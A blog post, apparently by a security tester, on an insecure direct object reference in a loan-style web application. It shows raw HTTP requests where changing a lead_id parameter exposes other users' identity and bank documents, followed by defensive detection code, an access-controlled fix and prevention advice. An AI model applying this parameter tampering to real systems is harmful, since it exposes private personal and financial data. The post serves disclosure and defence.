IDOR leads to compromise of PI (Personal Information) data

Swapnil bodekar
2 min read · Jan 7, 2021


Hi friends,

I am writing my first blog on Insecure Direct Object Reference (IDOR). What an interesting topic to write about indeed! I found this vulnerability during a security assessment. I will try to explain how I found personal information using IDOR, such as an Aadhaar card, PAN card, bank statement, bank passbook, salary slip, cancelled cheque, etc.

What is IDOR?

Insecure direct object reference is a type of access control vulnerability. It arises when an application uses user-supplied input (such as a record ID) to access an object directly, without verifying that the requesting user is authorized to access that object. An attacker can therefore bypass authorization and access resources in the system directly, simply by supplying a different identifier.

Figure 1.0

How I found an IDOR on the target.com website

Let’s assume the website’s name is target.com (I can’t reveal the real name for obvious reasons). Initially I made a long list of tests to perform on the website, and IDOR was at the top of that list. You can call it luck that I found it on the first go. The application had a “Preview application” feature, and when I clicked that button I observed that the application was serving data to the client according to a lead_id that was passed in the request in plain text.

I came to the Preview application section, which sent a request like the one below:

Before manipulation

POST /details HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: https://target.com
Connection: close
Referer: https://target.com/dashboard
Cookie: xxxxxxxx
Upgrade-Insecure-Requests: 1

lead_id=12345

I tweaked it a little to check what more it could reveal:

After manipulation

POST /details HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: https://target.com
Connection: close
Referer: https://target.com/dashboard
Cookie: xxxxxxxx
Upgrade-Insecure-Requests: 1

lead_id=12332

I received a successful response from the server. Later, I was able to get any user’s account information by randomly changing the lead_id, and was able to download the PAN card, Aadhaar card, bank statement, bank passbook, salary slip, address proof document, loan details, agreement document, cancelled cheque and so on belonging to that particular id.
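From the defender’s side, the pattern described above (one session fetching one lead after another, every request answered with 200) is visible in the application’s access logs. The following is an added example, not code from the original post or from the assessed application: it parses a constructed log format and flags any session that successfully retrieved more distinct lead_id values than a threshold. The log line layout, the session identifiers and the lead_id values are all invented for this example.

```python
# Added example (not part of the original post): flag sessions that pull many
# distinct lead_ids through POST /details. Log format and lines are constructed.
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed log format:
#   <timestamp> session=<id> POST /details lead_id=<n> status=<code>
SAMPLE_LOG = """\
2021-01-07T10:00:01 session=abc123 POST /details lead_id=12345 status=200
2021-01-07T10:00:09 session=abc123 POST /details lead_id=12332 status=200
2021-01-07T10:00:15 session=abc123 POST /details lead_id=12333 status=200
2021-01-07T10:00:21 session=abc123 POST /details lead_id=12334 status=200
2021-01-07T10:00:27 session=abc123 POST /details lead_id=12335 status=200
2021-01-07T10:01:00 session=zzz999 POST /details lead_id=50001 status=200
2021-01-07T10:01:05 session=zzz999 POST /details lead_id=50001 status=200
2021-01-07T10:01:30 session=qqq111 POST /details lead_id=70000 status=403
"""

LINE_RE = re.compile(
    r"session=(?P<session>\S+) POST /details lead_id=(?P<lead>\d+) status=(?P<status>\d+)"
)


def leads_per_session(log_text: str) -> Dict[str, Set[int]]:
    """Map each session to the set of distinct lead_ids it fetched with a 200.

    Only successful responses are counted: with an IDOR every tampered
    request succeeds, so there are no 403/404 errors to alert on, and the
    signal is the number of distinct records one session reads.
    """
    seen: Dict[str, Set[int]] = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m is None or m.group("status") != "200":
            continue
        seen[m.group("session")].add(int(m.group("lead")))
    return seen


def is_mostly_sequential(lead_ids: Set[int]) -> bool:
    """True when at least half of the sorted ids are exactly 1 apart.

    Legitimate users look at their own record; a run of adjacent ids is the
    footprint of someone walking the id space.
    """
    ordered = sorted(lead_ids)
    if len(ordered) < 2:
        return False
    adjacent = sum(1 for a, b in zip(ordered, ordered[1:]) if b - a == 1)
    return adjacent * 2 >= len(ordered) - 1


def flag_enumerating_sessions(log_text: str, threshold: int = 3) -> List[str]:
    """Return sessions that read more than `threshold` distinct leads."""
    return sorted(
        session
        for session, leads in leads_per_session(log_text).items()
        if len(leads) > threshold
    )


if __name__ == "__main__":
    for session in flag_enumerating_sessions(SAMPLE_LOG):
        leads = leads_per_session(SAMPLE_LOG)[session]
        print(session, len(leads), "leads, sequential:", is_mostly_sequential(leads))
```

The threshold is deliberately low here because a "preview my application" feature should only ever return the caller's own record; in a real deployment it would be tuned to the number of leads a single user can legitimately own.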

Great!! I’ve struck gold!!

How to prevent

The best way to prevent IDOR is to perform an access control check on every request that references an object, verifying that the authenticated user is authorized to access the requested object (for example, that the lead identified by lead_id actually belongs to the logged-in user) rather than trusting the identifier supplied by the client.
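To make the difference concrete, here is an added example (my own illustration, not code from the original post or from the assessed application) of a minimal /details handler in the vulnerable form beside the access-controlled form. The in-memory lead store, user ids and document names are constructed; the only thing taken from the write-up is the lead_id form field and the two ids 12345 and 12332.

```python
# Added example (not from the original post): a "Preview application" lookup
# with the IDOR beside its fix. All data below is constructed for illustration.
from dataclasses import dataclass
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised when the caller is not allowed to view the requested lead."""


@dataclass(frozen=True)
class Lead:
    lead_id: int
    owner_user_id: int          # the applicant this lead belongs to
    documents: Tuple[str, ...]  # uploaded document names (constructed sample)


# Constructed stand-in for the application's database.
LEADS: Dict[int, Lead] = {
    12345: Lead(12345, owner_user_id=1, documents=("pan_card.pdf", "bank_statement.pdf")),
    12332: Lead(12332, owner_user_id=2, documents=("aadhaar_card.pdf", "salary_slip.pdf")),
}


def details_vulnerable(session_user_id: int, lead_id: int) -> Optional[Lead]:
    """IDOR: the lead is fetched purely by the client-supplied lead_id.

    session_user_id is available from the session cookie but never consulted,
    so any authenticated user can read any lead by changing the number in the
    POST body.
    """
    return LEADS.get(lead_id)


def details_fixed(session_user_id: int, lead_id: int) -> Lead:
    """Access-controlled lookup: the object reference still comes from the
    client, but the server checks ownership before returning the record.

    A missing record and a record owned by someone else both raise Forbidden,
    so the response does not reveal whether a given lead_id exists.
    """
    lead = LEADS.get(lead_id)
    if lead is None or lead.owner_user_id != session_user_id:
        raise Forbidden(f"user {session_user_id} may not view lead {lead_id}")
    return lead


def parse_form_body(body: str) -> Dict[str, str]:
    """Parse an application/x-www-form-urlencoded body such as 'lead_id=12332'."""
    return {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}


def handle_post_details(session_user_id: int, body: str, fixed: bool = True) -> dict:
    """Simulate POST /details; return an HTTP-like status plus the documents served."""
    try:
        lead_id = int(parse_form_body(body)["lead_id"])
    except (KeyError, ValueError):
        return {"status": 400, "documents": []}
    try:
        if fixed:
            lead = details_fixed(session_user_id, lead_id)
        else:
            lead = details_vulnerable(session_user_id, lead_id)
    except Forbidden:
        return {"status": 403, "documents": []}
    if lead is None:
        return {"status": 404, "documents": []}
    return {"status": 200, "documents": list(lead.documents)}


if __name__ == "__main__":
    # User 1 changes lead_id from 12345 to 12332, as in the write-up.
    print(handle_post_details(1, "lead_id=12332", fixed=False))  # user 2's documents leak
    print(handle_post_details(1, "lead_id=12332", fixed=True))   # 403, nothing served
```

The fix is the ownership comparison in details_fixed; the identifier itself can stay numeric. Making ids random or unguessable is only defence in depth and does not replace the check, because a leaked or shared id would still grant access without it.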

Special thanks to @rahul singh and kishore hariram for always motivating me to do better.

Happy hacking !!
